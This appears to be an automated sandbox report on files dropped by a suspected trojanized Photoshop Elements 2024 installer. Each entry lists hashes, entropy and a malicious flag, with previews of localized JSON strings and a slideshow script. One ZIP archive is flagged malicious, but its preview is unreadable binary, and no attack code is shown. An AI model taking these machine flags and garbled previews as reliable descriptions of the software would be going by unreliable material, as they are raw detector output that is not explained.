                                                                                                      SHA1:6AF155B51CEB61221CEEC01F2E08D6F3BFE17975
                                                                                                      SHA-256:8AEF2EA22DF7060EA34F2F1A94EE63D337C816BBA47B80B7EB70B1FE52550D2C
                                                                                                      SHA-512:2F3CACC96C06B22169C07AAB7FD1812784FA7BAB977DEC4D22290EFB0B3B982079C83B520087BE6E17AA65AA59C4FD6A89AD45716E900E87BC80C4EE3778C781
                                                                                                      Malicious:true
                                                                                                      Preview:PK........A?7W................Dictionary/PK........A?7W................css/PK........A?7W................images/PK........A?7W................lib/PK.........+7W...&............carousel.js.U]o.8.|...@....}...iS..@..."....}.}.+1...i.tl.....>,9qU...,s.........[.Lh.N..Sr....R..}E........58<8<(.U.}=<@.&.?%.%.tP.D..CC.0..Mh.4K..[x!8.bk............8. tDp...[6.:.H*..-..*..#n..[.. ...7Y.-.%y..ovN.0...<.!N..+;_.Kr...........j>..>[.}..U(WwfQ.G..#.z|+D.........yU..(.J..i.S.x/.DxV.q.G.dGL.:..N......l.S.K...u.{....s...xT......s7.Q)..d.....,....R*.+.jRK....0..,..w.g.....x.t8Dg...2=.1.KM...3.u.+...BhG.xL...X..>.....~.............."....d:.9].......byV.......V.=.....'...g3.:9~..!.....s.[....L.2..3........m+F./..$L/.Qm...2..k.q...... ..>....x!..9)P&p..M;N.'C.z:...\@.\Ih.H..?N..d..8.i.K...$u.N...RN.1fC.DGfL...%u...:...X..%Wp.t$.6.5..2.-...).v<.R.4m......;..Q..Z.T.O$+!..:7q..l.DhX..M..+.Y.V6..'f{2v..,..{4.K..*.ZA..+..&......s....7..8.X).1.Y..Z.....Stt..E....1....'83$.>.%0
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1015
                                                                                                      Entropy (8bit):5.284650663061944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:M0X5cRWm36aKQgO3lcQgj8fPJmKhxRR+SPoy1KaY4ScBhPbxZtqy3Ui:l566JQgC7gYfPRhx6SPo1/LcXNZtp
                                                                                                      MD5:44DB45EFBB65BAC062FB7C8B849A203D
                                                                                                      SHA1:00E75EA3FADB83DFC42616DEDF831F6BF8017EDC
                                                                                                      SHA-256:3D4D96649072E293B76A41A497B19BC48811B2C8BE9D2742255B96751BC09FEB
                                                                                                      SHA-512:683D31755D68816B6CD575956C2161FF92A89C4B8C6D188683E435E6C4BE5DA621FF9819DA65EFB524C1983395154DA8DAE98ED94F236A71517BF13CE519A64B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "V.ukov. lekce k aplikaci Photoshop Elements",.. "SubTitle": "Za.n.te, nau.te se z.klady a nechte se inspirovat.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64bitov. verze) (minim.ln. po.adavek)",.. "OperatingSystemMac": "Mac OS 10.12 (minim.ln. po.adavek)",.. "Memory": "Instalace aplikace vy.aduje alespo. 4 GB pam.ti RAM",.. "TextSlide1": "Sjedno.te barvu a.t.n s.jinou fotografi. nebo vyu.ijte p.ednastaven..",.. "TextSlide2": "Vytvo.te stylizovan. text za p.r sekund.",.. "TextSlide3": "Vytv..ejte a sd.lejte foto p.sma ve form.tu MP4.",.. "TextSlide4": "Jedn.m kliknut.m vyb.rejte oblohu nebo pozad.. ",.. "TextSlide5": "Nov., osv..en. podoba - se sv.tl.mi a tmav.mi re.imy.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel Rychl. akce pro .pravy jedn.m kliknut.m",.. "TextSlide8": "Integrace slu.by Adobe Stock",.. "TextSlide9": "Aktualizace webov. a.mobiln. verze ",.. "TextSlide10": "(betaverze pouze v.an
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):946
                                                                                                      Entropy (8bit):4.953889317998113
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWqWN36awP3lc90XpYn9VVRndMMAEBzSKhm5tG9kx:vX6hfyXn9523GI5tV
                                                                                                      MD5:1FBC842F9A1E6F76E6ACF661816FE62E
                                                                                                      SHA1:D8B0EC6941246B4B423C1A15467EFBCAEC8121A7
                                                                                                      SHA-256:5D6ABD25084CBF6F04D54C0164E5E0B3F89D969A91E2E850C7DAE77588E571B8
                                                                                                      SHA-512:58A0A04E76B0D0F35EAA01B03F37DFBBEDD60279FFCCB26CC4FD34F6562DD8ECA8CF1891578861A06C393AA82A5E41537618D6598E4080264FBB1B4C7B024170
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements . Tutorials",.. "SubTitle": "Erste Schritte, Grundlagen, Inspirationen.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-Bit) (mindestens erforderlich)",.. "OperatingSystemMac": "Mac OS 10.12 (mindestens erforderlich)",.. "Memory": "Sie ben.tigen mindestens 4 GB RAM, um die Anwendung zu installieren",.. "TextSlide1": "An Farbe und Ton eines anderen Fotos anpassen oder Vorgaben nutzen.",.. "TextSlide2": "Stilisierten Text in Sekundenschnelle erstellen.",.. "TextSlide3": "MP4-Foto-Reel erstellen und teilen.",.. "TextSlide4": "Einen Himmel oder Hintergrund per Mausklick ausw.hlen.",.. "TextSlide5": "Neuer, frischer Look . mit Hell- und Dunkel-Modi.",.. "TextSlide6": "Plus",.. "TextSlide7": "Schnellaktionen zur kinderleichten Bearbeitung",.. "TextSlide8": "Integration mit Adobe Stock",.. "TextSlide9": "Web- und Mobil-Updates ",.. "TextSlide10": "(Beta nur in englischer Sprache)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835
                                                                                                      Entropy (8bit):5.02637898118712
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RMRWsRVg6aE3lchllo8ElVwsa5kHgN7FYtQ:RDso6vEWRl6RyANh
                                                                                                      MD5:BA0A234966CC8F97101F456C96AC4632
                                                                                                      SHA1:8D00C13D7EF727210996BAD946F763B9FDB69FB0
                                                                                                      SHA-256:168D3D6C0C91C0850865733EB244760F6BB3DE0902395A443AFC44B02592A048
                                                                                                      SHA-512:391F67878830E4C907EEB5A387B94E411A9862559677264AC18A19A36840035520DE7E40B5BEE041483C1AC6B66D3ABDD389E7502C423D6FC701AB2088580D6E
                                                                                                      Malicious:false
                                                                                                      Preview:{..."Name":."Photoshop Elements tutorials",..."SubTitle":."Get started, get the essentials, get inspired.",..."Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",..."TextSlide1": "Match the color & tone from another photo or use presets.",..."TextSlide2": "Create stylized text in seconds.",..."TextSlide3": "Create & share MP4 Photo Reels.",..."TextSlide4": "One-click to select a sky or background.",..."TextSlide5": "New refreshed look . with light and dark modes.",..."TextSlide6": "Plus",..."TextSlide7": "Quick Actions panel for one-click edits",..."TextSlide8": "Adobe Stock integration",..."TextSlide9": "Web & mobile updates ",..."TextSlide10": "(English-only beta)"..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.889772694170443
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ycRW05836yd3lcsRmz42/gcA69PAHxZDx8lHntBKvsI:qYY6evB2/GWlHntBAsI
                                                                                                      MD5:6D77FA7C087128F0DDACB5D1C86C95E2
                                                                                                      SHA1:668E0CA6D419FA09A4DB81BC8469BAF686835A46
                                                                                                      SHA-256:320A7B8CD564064EC11925C96F0F323B19FFC82440439C4B87ABFF59A658F1E5
                                                                                                      SHA-512:2F66150B342F41F2968B44001EE53F6457081DD58A715DDF68DFFAE3B5213643AA7BB6435E7DFDAB518533EFDD0A407412B8DF9948A7CAAB14A34BE6C6377CDC
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriales de Photoshop Elements",.. "SubTitle": "Empiece, descubra los fundamentos y encuentre inspiraci.n.",.. "Operating1xWin": "Windows 7 con Service Pack 1 (64 bits) (m.nimo requerido)",.. "OperatingSystemMac": "Mac OS 10.12 (m.nimo requerido)",.. "Memory": "Se necesita un m.nimo de 4.GB de RAM para instalar la aplicaci.n",.. "TextSlide1": "Combine el color y el tono de otra foto, o bien utilice ajustes preestablecidos.",.. "TextSlide2": "Cree un texto estilizado en segundos.",.. "TextSlide3": "Cree y comparta reels de fotos en MP4.",.. "TextSlide4": "Haga clic una vez para seleccionar un cielo o fondo.",.. "TextSlide5": "Nuevo estilo renovado con modos claro y oscuro.",.. "TextSlide6": "M.s",.. "TextSlide7": "Panel Acciones r.pidas para realizar ediciones con un solo clic",.. "TextSlide8": "Integraci.n con Adobe Stock",.. "TextSlide9": "Actualizaciones web y m.viles ",.. "TextSlide10": "(Beta solo en ingl.s)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1027
                                                                                                      Entropy (8bit):5.00331328127714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:x6cRWqKJ36hxMM3lQCidzBjNR2NPjyFBWdsBXJKAvE1uoXutXUB9Rn:gqKB6hxt+B1jNR2NVdsBZrvNyutkpn
                                                                                                      MD5:CC854F1036F7591BF00E2AFEB465F659
                                                                                                      SHA1:60457317A8F7F241C3F94595C13E37F4A8DC3352
                                                                                                      SHA-256:67A1C6394300FB01B4DF5C8D1ECCA0AB026797BD2C1BEB09084BEA356DF89754
                                                                                                      SHA-512:8A26F56E1E6861C1CFCF07F8349AD0F32FC60D962E5433997B7F6F8B7D361F172A8CDB9717297EC91ECD7989A88B1A93D696382BA5852723528DBACD50F70D8E
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriels Photoshop Elements",.. "SubTitle": "Lancez-vous, saisissez l'essentiel, soyez inspir..",.. "Operating1xWin": "Windows.7.Service.Pack.1 (64.bits) (minimum requis)",.. "OperatingSystemMac": "Mac.OS.10.12 (minimum requis)",.. "Memory": "Vous avez besoin de 4.Go de m.moire vive minimum pour installer l'application.",.. "TextSlide1": "Faites correspondre la couleur et le ton d.une autre photo ou utilisez des param.tres pr.d.finis.",.. "TextSlide2": "Cr.ez du texte stylis. en quelques secondes.",.. "TextSlide3": "Cr.ez et partagez des Bobines de photos MP4.",.. "TextSlide4": "Un seul clic pour s.lectionner un ciel ou un arri.re-plan.",.. "TextSlide5": "Nouveau look revisit. avec les modes clair et fonc..",.. "TextSlide6": "Plus",.. "TextSlide7": "Panneau Actions rapides pour les modifications en un clic",.. "TextSlide8": "Int.gration dans Adobe Stock",.. "TextSlide9": "Mises . jour Web et mobiles ",.. "TextSlide10": "(Version beta
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.801728131561229
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ym3cRWV9z36aMR13lcqR+8WI69y/2TEeeQIMcwmx4LeJqASUtXIH:JDP61FBvWI693IA5ASUtXo
                                                                                                      MD5:37879C31149C21FB5DF9DAADCD67E909
                                                                                                      SHA1:20E314739D229E4B5DA2AF435BB0F251C06DB0C9
                                                                                                      SHA-256:17AC21F4AD75970E29C644CAC412483B4AB3B5611807E6C963FB72189AD9989B
                                                                                                      SHA-512:CF29AC25D8DE0E0AD658B02AF25A0B88CE643F26679BE2B3F2E944E4B558FACBA94804CC88C32F550395708D0BDA003AD09FCBBFA2A9FA8FB70820F7775E0113
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Esercitazioni di Photoshop Elements",.. "SubTitle": "Iniziate, raccogliete tutto ci. che vi serve e lasciatevi ispirare.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 bit) (versione minima richiesta)",.. "OperatingSystemMac": "Mac OS 10.12 (versione minima richiesta)",.. "Memory": "Sono necessari almeno 4 Gb di RAM per installare l'applicazione",.. "TextSlide1": "Abbina il colore e il tono di un'altra foto o utilizza le preimpostazioni.",.. "TextSlide2": "Crea testo stilizzato in pochi secondi.",.. "TextSlide3": "Crea e condivi i reel di foto in MP4.",.. "TextSlide4": "Fai clic per selezionare un cielo o uno sfondo.",.. "TextSlide5": "Look rinnovato, con modalit. luce e buio.",.. "TextSlide6": "Pi.",.. "TextSlide7": "Pannello Azioni rapide per modifiche con un clic",.. "TextSlide8": "Integrazione con Adobe stock",.. "TextSlide9": "Aggiornamenti Web e per dispositivi mobili ",.. "TextSlide10": "(Beta solo in inglese)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1127
                                                                                                      Entropy (8bit):5.56961836864283
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWOlFK2G5e36asK3lc32QV6XGS8kDqbzEzxQciMCj7EOL0uo8fJNoNYnXe8r:va0h5y65mA2N8hWu5pzxWNYnuo
                                                                                                      MD5:C31570E7CCB0FC3A4236B98ABBD0CC08
                                                                                                      SHA1:33AFEC87102C157C7A7B80D0058F40F591E0BBC3
                                                                                                      SHA-256:E645B23E361162F77EDB93AC9028F094C8CC316B2B9AAB88EA4690D43F554BFE
                                                                                                      SHA-512:6B3A2FF37B7EE09BB5FA55DE7F072647DE4F3A54E003C4D08860AB4335E3E2EBB0AB9D483AA853A77D46B2C65F02FCD7CBB5FD12B98C9A88F976D5E64759C035
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements .......",.. "SubTitle": "........................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (..)",.. "OperatingSystemMac": "Mac OS 10.12 (..)",.. "Memory": "...................... 4GB . RAM ......",.. "TextSlide1": "................................",.. "TextSlide2": "....................",.. "TextSlide3": "MP4 .................",.. "TextSlide4": "1 ....................",.. "TextSlide5": "........................",.. "TextSlide6": "...",.. "TextSlide7": "..............................",.. "TextSlide8": "Adobe Stock
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):551
                                                                                                      Entropy (8bit):5.719924059723855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWzAwv/WgQYATnJPO4T3bu1BJGvdhEU3lcLD9gT6XOqjYkS9OTKHHVy1JZR:ARWswl8nVO+36UFKU3lcLM6XOqkpAU1O
                                                                                                      MD5:079C7C099407A71437825C7DF92A92B1
                                                                                                      SHA1:D8195B86E2FC055F86C6EBDF7BBED07A62157A1C
                                                                                                      SHA-256:7CBC5BC481D33E921C57652DA070E5536A2292169C8C000548BC9F3B5367B9A6
                                                                                                      SHA-512:D7E5FF122D86FDB82A4E939E87F0FFF794010A4C5F79FCE0DC0CCB59E9392B5DA7C52B1B99F2A33FA45998E58936A15B900F4AF385DF9684BC419E626D2634D7
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ...",.. "SubTitle": ".... .. ... ... .....",.. "Operating1xWin": "Windows 7 ... . 1(64..)(.. .. ..)",.. "OperatingSystemMac": "Mac OS 10.12(.. .. ..)",.. "Memory": "....... ..... .. 4GB. RAM. ......",.. "TextSlide1": "._Instantly turn photos into works of art.",.. "TextSlide2": "._Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):950
                                                                                                      Entropy (8bit):4.827268491011639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:IPwcRWDMH36aw3lcXISxODG87cU8XCDUEHEmtclaRAyJK:IUDw6NpSxqfDHvt6yJK
                                                                                                      MD5:12B2FAAEC8A5524181967996AE808234
                                                                                                      SHA1:45DE57CF1B5C0CD4C7FA4CFF9A2CEF54E3F71B72
                                                                                                      SHA-256:06C55DFBC16F965839945B5EF066FE98F05EC8146D5B317D22C7D83D6976D806
                                                                                                      SHA-512:C04D15AB32E4F0DE73E124E3A9CD10AEE73C132ACEA29AA343A8DAF5A9680A63B8A5675294880A7447269653F6339D9F215CC311755B3045659A165EF4777B75
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Zelfstudies voor Photoshop Elements",.. "SubTitle": "Ga aan de slag met handige tools en laat u inspireren.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bits) (minimaal vereist)",.. "OperatingSystemMac": "Mac OS 10.12 (minimaal vereist)",.. "Memory": "U hebt minimaal 4 GB RAM nodig om de toepassing te installeren",.. "TextSlide1": "Stem kleur en tint af op een andere foto of gebruik voorinstellingen.",.. "TextSlide2": "Maak in een oogwenk gestileerde tekst.",.. "TextSlide3": "Maak en deel MP4-reels met foto's.",.. "TextSlide4": "Selecteer de lucht of achtergrond met ..n klik.",.. "TextSlide5": "Nieuwe, verbeterde look met lichte en donkere modus.",.. "TextSlide6": "Plus",.. "TextSlide7": "Snelle handelingen voor bewerkingen met ..n muisklik",.. "TextSlide8": "Integratie met Adobe Stock",.. "TextSlide9": "Updates voor internet en mobiele apparaten ",.. "TextSlide10": "(B.ta, alleen Engelstalig)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1005
                                                                                                      Entropy (8bit):5.197252482745693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+cRW8l36cr3lctnThcoq19aoy7VyMEnrzyxYqD19t7P6f:GC6WC2zao+VyByYqx9ts
                                                                                                      MD5:A2BC40676845B4DDAFEAAB0523FF3671
                                                                                                      SHA1:AD321F26CEC3D9F2E6812AB525AB62403A145D6E
                                                                                                      SHA-256:55FC0609D045D6691129E51B196C71C3D4D98FC77A4DFE8FC6D62DB75C7B1680
                                                                                                      SHA-512:CD0D8E9374F96FECE5673E7F6D9C259329A991F0CE46C90AFC41A51A937853ABAB71E64AC110FDE3977B7638484E1CC204F08D33A779E067DB637F1B54288EA9
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Samouczki programu Photoshop Elements",.. "SubTitle": "Rozpocznij, poznaj wszystkie podstawy, zainspiruj si..",.. "Operating1xWin": "Windows 7 z dodatkiem Service Pack 1 (64-bitowy) (minimalna wymagana wersja)",.. "OperatingSystemMac": "Mac OS 10.12 (minimalna wymagana wersja)",.. "Memory": "Do instalacji aplikacji wymagane s. co najmniej 4 GB pami.ci RAM.",.. "TextSlide1": "Dopasuj kolor i odcie. zdj.cia lub u.yj ustawie. predefiniowanych.",.. "TextSlide2": "Utw.rz tekst stylizowany w kilka sekund.",.. "TextSlide3": "Tw.rz i udost.pniaj rolki fotograficzne MP4.",.. "TextSlide4": "Kliknij, aby wybra. niebo lub t.o.",.. "TextSlide5": "Nowy, od.wie.ony wygl.d - z trybem jasnym i ciemnym.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel szybkich operacji do b.yskawicznych edycji",.. "TextSlide8": "Integracja z us.ug. Adobe Stock",.. "TextSlide9": "Aktualizacje internetowe i.mobilne ",.. "TextSlide10": "(Wersja Beta tylko w.j.zyku angielskim
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1335
                                                                                                      Entropy (8bit):4.708899028432502
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vNcRW3tDc36llsSeJ3lccSeFJGvlqkEZmAhWaTT13hWaTT12hWaTT1FagiXF:V3R46MdZytqkSW+xW+EW+ZCF
                                                                                                      MD5:C08F7659EFCC7319CEA404C411852D7C
                                                                                                      SHA1:960E5E87D616CE32C02101DD95E31A1B9AA5CA01
                                                                                                      SHA-256:0A2B57E247570FCD544EE2D76BB2520824DA5BEC5CC41C4B4082354A8F67087A
                                                                                                      SHA-512:92CEE63DFF79C0F6875ED2B74328995C8A88F473E1E4A412DEF3EA5F6601B2A5EF424D4D1FA45F0E59083A405771A74C7B282AF6879C12E48F62E6AF4BB19781
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "........... .. Photoshop Elements",.. "SubTitle": ".......... ......, ......... ....., ......... ............",.. "Operating1xWin": "Windows 7 . ....... .......... SP1 (64-.........) (.......... .......... ......)",.. "OperatingSystemMac": "Mac OS 10.12 (.......... .......... ......)",.. "Memory": "... ......... .......... ......... ....... 4... ...",.. "TextSlide1": "..... ........ .......... ........... .......... . .......... GIF-............",.. "TextSlide2": "........... .......... ....... ....... . .......... ........ .......",.. "TextSlide4": "........... .......... ....... ....... . .......... ......
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):966
                                                                                                      Entropy (8bit):5.007707161623855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:UcRWUuN36oJ3l4Kh+sW92zJZ2KAaceGyBL2Jgsmks/NhGQsuUbz9k:wUud6ObhU2zAcGyBOo/NhHsU
                                                                                                      MD5:9A386BDD3D45947475EA973AA97A29FB
                                                                                                      SHA1:F5DA3004442F42B7A59512E35414E6F4758F0634
                                                                                                      SHA-256:7EC82E6599FA6E89DEE2837ECF6544C9062D2133D2D265F181C2710CC22E9129
                                                                                                      SHA-512:796F9078350951EB62CF203E655F9170A1F02DFD9A16E327764955C27437E872E7C2B7612C0817CB4BA52051A0DC4E0B71925DDB0F1E10A81D1E5A41AE645A7B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Sj.lvstudiekurser f.r Photoshop Elements",.. "SubTitle": "Kom ig.ng, l.r dig det grundl.ggande och bli inspirerad.",.. "Operating1xWin": "Windows 7 med Service Pack 1 (64-bitars) kr.vs",.. "OperatingSystemMac": "macOS 10.12 kr.vs",.. "Memory": "Om du vill installera programmet m.ste du ha minst 4 GB med RAM-minne",.. "TextSlide1": "Matcha f.rg och ton fr.n ett annat foto eller anv.nd f.rinst.llningar.",.. "TextSlide2": "Skapa stiliserad text p. n.gra sekunder.",.. "TextSlide3": "Skapa och dela filmrulle i mp4-format.",.. "TextSlide4": "Klicka en g.ng f.r att markera en himmel eller bakgrund.",.. "TextSlide5": "Nytt fr.scht utseende . med ljust och m.rkt l.ge.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panelen Snabb.tg.rder f.r redigeringar med ett klick",.. "TextSlide8": "Adobe Stock-integrering",.. "TextSlide9": "Webb- och mobiluppdateringar ",.. "TextSlide10": "(betaversion endast p. engelska)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):533
                                                                                                      Entropy (8bit):5.952077038813362
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWf0pJ3bu1BJoWhu0mdu3lcW0mdJ3xMIYyeKOTuHHVy1r9R:ARWf2J36aQue3lcW8T1Y1ydv
                                                                                                      MD5:9558152FC5BA73DAE53330E8F74103C3
                                                                                                      SHA1:4583E8593C9BFFE79DB23F204D40F459EE4C579A
                                                                                                      SHA-256:E716DAFAC7426644D61477EF792C1D26FF02E683494E6AE3BBF18FE5672F2409
                                                                                                      SHA-512:A860CFEEFAB7A35CD5B9BA4A9735ECFCD593291D32A846F531AE507A5090DB422F57C4C843341C50D33CC092FDAC8BC1F48ACAF217D400C71440998D2C571581
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ..",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1.64 ........",.. "OperatingSystemMac": "Mac OS 10.12......",.. "Memory": "..... 4GB RAM .........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):535
                                                                                                      Entropy (8bit):5.95952674339767
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWPu5tTJ3bu1BJoWI3lcnqX+M9L5KOTPWHHVy1b9R:ARWPufJ36a33lcqXnP1I1ydv
                                                                                                      MD5:480263433597D1DA400B0CAB80456B3C
                                                                                                      SHA1:B89620BDC7F4C0917EED3CD3D0DE256A8D2AD23B
                                                                                                      SHA-256:DEF0A09F07831DF10E11B346F2130509CB3AB30991C15A7FBDFE3D4AF6889562
                                                                                                      SHA-512:B910FFDFB82C529E6F8E73A389B336117751356273FF4DAC776F456E9298EF72C903A3F39A09EE2F01207FD7860E5BE1BF05AB94843320B51E954589FA524805
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ....",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 ..) (....)",.. "OperatingSystemMac": "Mac OS 10.12 (....)",.. "Memory": "..... 4 GB . RAM ........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):500
                                                                                                      Entropy (8bit):4.923628829725424
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWrsxRrW/c3bu1BJoWF3lcnRFJgjCd2OT+ZHHVy1HNTR:ARW2Rv36a83lcHd5K1yZNl
                                                                                                      MD5:8BE468F56ED75DF9FD6E9296736C7437
                                                                                                      SHA1:6A5387D379E90A41DF202F2186DD520F707C91B4
                                                                                                      SHA-256:AA811CB8BD2936A0B7F3F884E3347D9DBF4663ABFFDAF64401A13F7910C5FF86
                                                                                                      SHA-512:85C55278DBAF490AD4686CEA2D3EDCC54C891654FE16B5129F5D28C20C2AB9D3A6AB98286F93FFA09906E7D74FDA9A1E8357ABE2A9B2643879C5C775D9372510
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements tutorials",.. "SubTitle": "Get started, get the essentials, get inspired.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",.. "TextSlide1": "Instantly turn photos into works of art.",.. "TextSlide2": "Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2787
                                                                                                      Entropy (8bit):5.184018118549148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NrWwZsezuvmwQr3TcEuDgAIKRzpIrspGZXBi0ahMDPTAP96kP9N9P9ciP9aMHLPU:4wZ6pQrRu00lIrW4i0rTMU4LBSS574Es
                                                                                                      MD5:44D3F90C842E5387DD782BC6097FABBD
                                                                                                      SHA1:CB6F6D2D643A5D958BD00D7C212BD35C2BB4DDEB
                                                                                                      SHA-256:DDA5350E57A484A80CA07489F18F064D67E21CCB08B36FF2BFA2C37657D6F37F
                                                                                                      SHA-512:3BB152DA1E07A6A86C375A3790C65C185557F92B0148A0C41CB4E1C5D079C3F9E7EC33F6E08652669AB6BFCDABF61B358FDAA353CCF1BFB0D99E4B8C5F6188C6
                                                                                                      Malicious:false
                                                                                                      Preview:$(document).ready(function() { cecInit(); });....function cecInit() {.. var jsonData;.. var locale = getParameterByName("locale");.. var isHighDpi = getParameterByName("isHighDpi");.... $("html").attr("lang", locale.slice(0, 2));.... cecGetLocaleJson(locale);..}....function resizeWin() { myWindow.resizeTo(455, 239); }..var slideIndex = 0;..showSlides();....function showSlides() {.. var i;.. var slides = document.getElementsByClassName("mySlides");.. for (i = 0; i < slides.length; i++) {.. slides[i].style.opacity = "0";.. slides[i].style.visibility = "hidden";.. }.. slideIndex++;.. if (slideIndex > slides.length) {.. slideIndex = 1;.. }.... slides[slideIndex - 1].style.opacity = "1";.. slides[slideIndex - 1].style.visibility = "visible";.... if (slideIndex == 6) {.. slideIndex = 0;.. }.. setTimeout(showSlides, 6000); // Change image every 5 seconds..}....function getParameterByName(name) {.. name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");.. var
